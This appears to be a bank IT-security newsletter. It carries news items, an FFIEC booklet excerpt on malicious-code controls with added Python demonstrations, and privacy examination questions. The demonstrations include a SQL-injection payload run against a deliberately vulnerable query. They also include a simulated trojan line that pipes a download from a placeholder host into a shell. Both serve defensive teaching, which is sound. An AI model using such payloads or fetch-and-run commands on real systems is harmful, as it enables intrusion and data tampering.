Spending less than 5 minutes a week along
with a cup of coffee, you can monitor your IT
security as required
by the FDIC, OCC, FRB, FFIEC, NCUA, NIST, GLBA, HIPAA, and IT best practices.
For more information visit
REMINDER - This newsletter is
available for Android smartphones and tablets. Go to the
Market Store and search for yennik.
- Pessimism over FISMA deadline starts at the top, survey finds -
Fewer than half of the agencies represented in a recent poll expect
to meet the September deadline for using continuous monitoring to
meet Federal Information Security Management Act reporting
requirements, and C-level executives interviewed were more
pessimistic about their prospects for success than rank-and-file
No Warrant Needed for GPS Monitoring, Judge Rules - A Missouri
federal judge ruled the FBI did not need a warrant to secretly
attach a GPS monitoring device to a suspect’s car to track his
public movements for two months.
Password case reframes Fifth Amendment rights in context of digital
world - Beyond the log-in screen of Ramona Fricosu's laptop computer
lies what federal prosecutors say could be the key evidence in the
bank-fraud case against her.
GAO - Critical Infrastructure Protection: Cybersecurity Guidance Is
Available, but More Can Be Done to Promote Its Use
Release - http://www.gao.gov/products/GAO-12-92
Highlights - http://www.gao.gov/assets/590/587530.pdf
FTC settles with rewards company over security infractions - A
company that helps students save for college may have made them
richer, but also could have opened them up to fraud.
FedRAMP Security Controls Unveiled - Federal Risk and Authorization
Mgt. Program Vets Providers - The federal government has issued some
170 controls for FedRAMP, the program designed to vet cloud
computing providers for federal government agencies.
Israel vows to retaliate after credit cards are hacked - Israel has
said it will respond to cyber-attacks in the same way it responds to
violent "terrorist" acts after the credit card details of thousands
of its citizens were published online.
HSBC ATM Skimmer Arrested - Romanian Charged with $1.5 Million Scam
- New York law enforcement authorities have announced the takedown
of an ATM skimming scheme that compromised more than 40 ATMs at HSBC
bank branches in Manhattan, Long Island, and Westchester, N.Y.
BYOD planning gets a big boost - A key technology to allow for the
secure use of personal devices on the network is virtual desktop
infrastructure. We're making big strides toward our CIO's goal of
enabling a "bring your own device" (BYOD) policy.
ATTACKS, INTRUSIONS, DATA THEFT & LOSS
Saudi hackers plaster 14,000 credit card privates on web - Raid on
Israeli sites exposes up to 400,000 punters - A Saudi Arabian
hacking group claims it has leaked information on up to 400,000
Israelis, including names, addresses and credit card details.
Stratfor subscribers receive phony emails - The hackers who raided
the servers belonging to global intelligence firm Stratfor are using
some of their plunder to send fictitious emails to subscribers.
Hackers say they have Symantec's Norton AV source code - Hackers,
possibly from India, claim they have lifted the source code for
Symantec's Norton AntiVirus product, and are planning to post it.
- Spam with QR code targets mobile users - Researchers have revealed
a new type of spam campaign that appears to be a test run to find
out how mobile users will respond to social engineering attempts on
their smartphones and tablets.
WEB SITE COMPLIANCE -
Financial institutions advertising or selling non-deposit investment
products on-line should ensure that consumers are informed of the
risks associated with non-deposit investment products as discussed
in the "Interagency Statement on Retail Sales of Non Deposit
Investment Products." On-line systems should comply with this
Interagency Statement, minimizing the possibility of customer
confusion and preventing any inaccurate or misleading impression
about the nature of the non-deposit investment product or its lack
of FDIC insurance.
INFORMATION TECHNOLOGY SECURITY -
We continue our series on the
FFIEC interagency Information Security Booklet.
CONTROLS TO PROTECT AGAINST MALICIOUS CODE
Typical controls to protect against malicious code use technology,
policies and procedures, and training. Prevention and detection of
malicious code typically involves anti-virus and other detection
products at gateways, mail servers, and workstations. Those products
generally scan messages for known signatures of a variety of
malicious code, or potentially dangerous behavioral characteristics.
Differences between products exist in detection capabilities and the
range of malicious code included in their signatures. Detection
products should not be relied upon to detect all malicious code.
Additionally, anti-virus and other products that rely on signatures
generally are ineffective when the malicious code is encrypted, because a
scanner cannot match patterns in content it cannot read. For example, VPNs,
IPsec tunnels, and encrypted e-mail will all shield malicious code from a
gateway scanner; the code is exposed only where it is decrypted, so scanning
must also take place there, typically on the receiving host.
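To make that caveat concrete, here is a small added example (written for this page, not part of the FFIEC booklet or any vendor product) of a signature scanner being defeated by encryption. It uses the public EICAR test string as one signature and a constructed byte pattern as a hypothetical second one; the XOR routine is a toy stand-in for whatever cipher a VPN, IPsec tunnel or encrypted mail client applies, and the key and message are constructed.

```python
# Added example: signature scanning vs. encrypted content (not FFIEC code).
EICAR = b"X5O!P%@AP[4\\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*"

# Signature table: the public EICAR test pattern plus a constructed,
# hypothetical byte sequence standing in for a real malware signature.
SIGNATURES = {
    "EICAR-Test-File": EICAR,
    "Hypothetical.Dropper.A": b"\x90\x90\xeb\x1f\x5e\x89\x76\x08",
}


def scan(data: bytes) -> list:
    """Signature scan: report every known pattern that occurs in data."""
    return [name for name, sig in SIGNATURES.items() if sig in data]


def xor_crypt(data: bytes, key: bytes) -> bytes:
    """Toy symmetric transform standing in for the encryption a VPN, IPsec
    tunnel or encrypted e-mail applies. Applying it twice restores the data."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def demo() -> dict:
    """Scan the same message in the clear, in transit (encrypted) and after
    decryption on the receiving host."""
    # Constructed sample message carrying the EICAR test pattern.
    message = b"Subject: invoice\r\n\r\n" + EICAR + b"\r\n"
    key = b"s3cr3t"            # constructed key; any key shows the effect
    in_transit = xor_crypt(message, key)
    return {
        "plaintext_hits": scan(message),              # gateway sees clear text
        "ciphertext_hits": scan(in_transit),          # gateway sees ciphertext only
        "after_decrypt_hits": scan(xor_crypt(in_transit, key)),  # endpoint scan
    }


if __name__ == "__main__":
    for stage, hits in demo().items():
        print(f"{stage}: {hits or 'nothing detected'}")
```

The practical consequence is placement: a gateway scanner on an encrypted path sees nothing, so detection has to run where the content is in the clear (the mail server after TLS termination, or the workstation after the message is opened), or the gateway has to terminate and inspect the encrypted session itself.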
Signature-based anti-virus products scan for unique components of
certain known malicious code. Since new malicious code is created
daily, the signatures need to be updated continually. Different
vendors of anti-virus products update their signatures on different
frequencies. When an update appears, installing the update on all of
an institution's computers may involve automatically pushing the
update to the computers, or requesting users to manually obtain the
Heuristic anti-virus products generally execute code in a
protected area of the host (a sandbox or emulator) and analyze its
behavior for hostile intent. Heuristic products are meant to defend
against previously unknown or disguised malicious code.
Malicious code may be blocked at the firewall or gateway. For
example, a general strategy might be to block all executable e-mail
attachments, as well as any ActiveX controls or Java applets. A more refined
strategy might block based on certain characteristics of known code.
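As an added example (mine, not from the booklet or any gateway product), here is a Python attachment filter that applies both strategies at once: it blocks by file extension and by content, so an executable renamed to look like a document is still caught. The extension list, the magic-number table and the sample attachments are constructed and deliberately short.

```python
import io
import os
import zipfile
from typing import Optional, Tuple

# Added example, not FFIEC or vendor code. Lists are illustrative and short.
BLOCKED_EXTENSIONS = {
    ".exe", ".dll", ".scr", ".com", ".pif", ".bat", ".cmd", ".vbs", ".js",
    ".jar", ".class",   # Java
    ".ocx",             # ActiveX control
}

# Leading bytes ("magic numbers") that identify executable containers
# regardless of what the file is called.
MAGIC = {
    b"MZ": "pe-executable",           # Windows EXE/DLL/SCR/OCX
    b"\x7fELF": "elf-executable",
    b"\xca\xfe\xba\xbe": "java-class",
    b"PK\x03\x04": "zip-container",   # also JAR; members inspected below
}


def sniff(data: bytes) -> Optional[str]:
    """Identify the content type from its first bytes, or None if unknown."""
    for magic, kind in MAGIC.items():
        if data.startswith(magic):
            return kind
    return None


def zip_contains_blocked(data: bytes) -> bool:
    """True if any member of the archive has a blocked extension."""
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return any(os.path.splitext(n)[1].lower() in BLOCKED_EXTENSIONS
                       for n in zf.namelist())
    except zipfile.BadZipFile:
        return True   # fail closed: a malformed archive is not trusted


def attachment_verdict(filename: str, data: bytes) -> Tuple[str, str]:
    """Return ("block" | "allow", reason) for one attachment."""
    ext = os.path.splitext(filename)[1].lower()
    if ext in BLOCKED_EXTENSIONS:
        return "block", f"extension {ext} is on the block list"
    kind = sniff(data)
    if kind in ("pe-executable", "elf-executable", "java-class"):
        return "block", f"content is {kind} despite extension {ext or '(none)'}"
    if kind == "zip-container" and zip_contains_blocked(data):
        return "block", "archive contains a blocked file type"
    return "allow", "no executable content detected"


def make_zip(entries: dict) -> bytes:
    """Build an in-memory zip from {name: bytes} (constructed test data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        for name, content in entries.items():
            zf.writestr(name, content)
    return buf.getvalue()


def demo() -> dict:
    """Verdicts for a handful of constructed attachments."""
    pe_header = b"MZ\x90\x00\x03\x00\x00\x00"   # constructed PE-like prefix
    samples = {
        "setup.exe": pe_header,                  # blocked by extension
        "report.pdf": pe_header,                 # renamed executable: blocked by content
        "notes.txt": b"Meeting moved to 3pm\n",  # harmless
        "tools.zip": make_zip({"tool.exe": pe_header}),
        "docs.zip": make_zip({"readme.txt": b"hello\n"}),
    }
    return {name: attachment_verdict(name, data) for name, data in samples.items()}


if __name__ == "__main__":
    for name, (verdict, reason) in demo().items():
        print(f"{name:12s} {verdict:5s} {reason}")
```

Extension lists alone are easy to evade (new file types, double extensions, renamed binaries), which is why the content check matters; conversely, a password-protected archive cannot be opened by the gateway at all, which is the encryption caveat from the previous paragraph in another form.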
Protection of servers involves examining input from users and only
accepting that input which is expected. This activity is called
filtering. If filtering is not employed, a Web site visitor, for
instance, could employ an attack that inserts code into a response
form, causing the server to perform certain actions. Those actions
could include changing or deleting data and initiating fund
Protection from malicious code also involves limiting the
capabilities of the servers and Web applications to only include
functions necessary to support operations. See "Systems Development,
Acquisition, and Maintenance."
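The filtering described two paragraphs above, together with limiting what the application will do, can be shown with a small added example (mine, not the booklet's) in Python against an in-memory SQLite database standing in for a Web form that charges a fee to an account. The account-number format, the table layout and the hostile input are all constructed for the illustration.

```python
import re
import sqlite3

# Added example, not FFIEC code. Everything below is constructed test data.
ACCOUNT_RE = re.compile(r"[0-9]{8,12}")   # what an expected account number looks like
FEE_SQL_VULNERABLE = "UPDATE accounts SET balance = balance - 10 WHERE number = '{}'"
FEE_SQL_BOUND = "UPDATE accounts SET balance = balance - 10 WHERE number = ?"


def fresh_db() -> sqlite3.Connection:
    """Two sample accounts in an in-memory database."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE accounts (number TEXT PRIMARY KEY, balance INTEGER)")
    conn.executemany("INSERT INTO accounts VALUES (?, ?)",
                     [("12345678", 500), ("87654321", 2500)])
    conn.commit()
    return conn


def charge_fee_unfiltered(conn: sqlite3.Connection, account: str) -> int:
    """Vulnerable: the form field is spliced straight into the statement.
    Returns the number of rows the statement changed."""
    cur = conn.execute(FEE_SQL_VULNERABLE.format(account))
    conn.commit()
    return cur.rowcount


def charge_fee_filtered(conn: sqlite3.Connection, account: str) -> int:
    """Hardened: accept only input of the expected shape, and bind the value
    as a parameter so it can never be parsed as SQL."""
    if not ACCOUNT_RE.fullmatch(account):
        raise ValueError("rejected: input is not an account number")
    cur = conn.execute(FEE_SQL_BOUND, (account,))
    conn.commit()
    return cur.rowcount


def demo() -> dict:
    hostile = "' OR '1'='1"       # constructed injection payload from a form field
    legit = "12345678"

    # 1. No filtering: the WHERE clause becomes always-true, every account is charged.
    unfiltered_rows = charge_fee_unfiltered(fresh_db(), hostile)

    # 2. Filtering: the hostile string fails the allowlist and is never executed.
    try:
        charge_fee_filtered(fresh_db(), hostile)
        filtered = "accepted"
    except ValueError:
        filtered = "rejected"

    # 3. Binding alone (no allowlist) already renders the string inert: it is
    #    compared literally with the account numbers and matches none.
    bound_rows = fresh_db().execute(FEE_SQL_BOUND, (hostile,)).rowcount

    # 4. Expected input passes the filter and changes exactly one row.
    legit_rows = charge_fee_filtered(fresh_db(), legit)

    return {"unfiltered_rows": unfiltered_rows, "filtered": filtered,
            "bound_rows": bound_rows, "legit_rows": legit_rows}


if __name__ == "__main__":
    print(demo())
```

Two layers are shown on purpose: the allowlist rejects anything that does not look like the field the form expects, and parameter binding means that even input which slips past the allowlist is treated as data rather than as part of the statement.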
Anti-virus tools and code blocking are not comprehensive solutions.
New malicious code could have different signatures, and bypass other
controls. Protection against newly developed malicious code
typically comes in the form of policies, procedures, and user
awareness and training. For example, policies could prohibit the
installation of software by unauthorized employees, and regular
reviews for unauthorized software could take place. System users
could be trained not to open unexpected messages, not to open any
executables, and not to allow or accept file transfers in P2P
communications. Additional protection may come from disconnecting
and isolating networks from each other or from the Internet in the
face of a fast-moving malicious code attack.
An additional detection control involves network and host intrusion
detection devices. Network intrusion detection devices can be tuned
to alert when known malicious code attacks occur. Host intrusion
detection systems can be tuned to alert when they recognize abnormal
system behavior, the presence of unexpected files, and changes to other
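The host-based part of that control, watching for unexpected files and changes to existing ones, is usually a file-integrity check: hash a baseline, rehash later, and report the differences. Here is an added Python example (mine, not from the booklet or any HIDS product) that runs against a temporary directory populated with constructed files, simulating a trojaned script, a dropped file and a deleted configuration file; the placeholder URL is not a real host.

```python
import hashlib
import os
import tempfile

# Added example of a file-integrity check, not FFIEC or product code.


def baseline(root: str) -> dict:
    """Map every file under root (path relative to root, '/'-separated) to
    its SHA-256 hex digest."""
    snapshot = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            with open(path, "rb") as fh:
                digest = hashlib.sha256(fh.read()).hexdigest()
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            snapshot[rel] = digest
    return snapshot


def compare(old: dict, new: dict) -> dict:
    """Classify differences between two snapshots."""
    return {
        "added": sorted(set(new) - set(old)),          # unexpected new files
        "removed": sorted(set(old) - set(new)),
        "modified": sorted(p for p in set(old) & set(new) if old[p] != new[p]),
    }


def write(root: str, rel: str, content: bytes) -> None:
    """Helper to create a file (and its directories) under root."""
    path = os.path.join(root, *rel.split("/"))
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as fh:
        fh.write(content)


def demo() -> dict:
    """Take a baseline, simulate a compromise, and report what changed.
    All file names and contents are constructed for the illustration."""
    with tempfile.TemporaryDirectory() as root:
        write(root, "bin/login", b"#!/bin/sh\nexec /usr/bin/login \"$@\"\n")
        write(root, "etc/hosts", b"127.0.0.1 localhost\n")
        base = baseline(root)

        # Simulated compromise: login script replaced by a downloader (the
        # URL is a placeholder), a hidden dropper left behind, hosts deleted.
        write(root, "bin/login", b"#!/bin/sh\ncurl http://example.invalid/x | sh\n")
        write(root, "tmp/.x", b"\x7fELF\x02\x01\x01")
        os.remove(os.path.join(root, "etc", "hosts"))

        return compare(base, baseline(root))


if __name__ == "__main__":
    for kind, paths in demo().items():
        print(f"{kind:9s}: {', '.join(paths) or '-'}")
```

The baseline has to be kept where an intruder who can alter files cannot also rewrite it (off-host, on read-only media, or signed), and directories that legitimately change all the time need their own policy or the alerts become noise.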
INTERNET PRIVACY - We continue
our series listing the regulatory-privacy examination questions.
When you answer the question each week, you will help ensure
compliance with the privacy regulations.
Reuse & Redisclosure of nonpublic
personal information received from a nonaffiliated financial
institution under Sections 14 and/or 15.
A. Through discussions with management and review of the
institution's procedures, determine whether the institution has
adequate practices to prevent the unlawful redisclosure and reuse of
the information where the institution is the recipient of nonpublic
personal information (§11(a)).
B. Select a sample of data received from nonaffiliated financial
institutions, to evaluate the financial institution's compliance
with reuse and redisclosure limitations.
1. Verify that the institution's redisclosure of the information
was only to affiliates of the financial institution from which the
information was obtained or to the institution's own affiliates,
except as otherwise allowed in the step b below (§11(a)(1)(i) and
2. Verify that the institution only uses and shares the data
pursuant to an exception in Sections 14 and 15 (§11(a)(1)(iii)).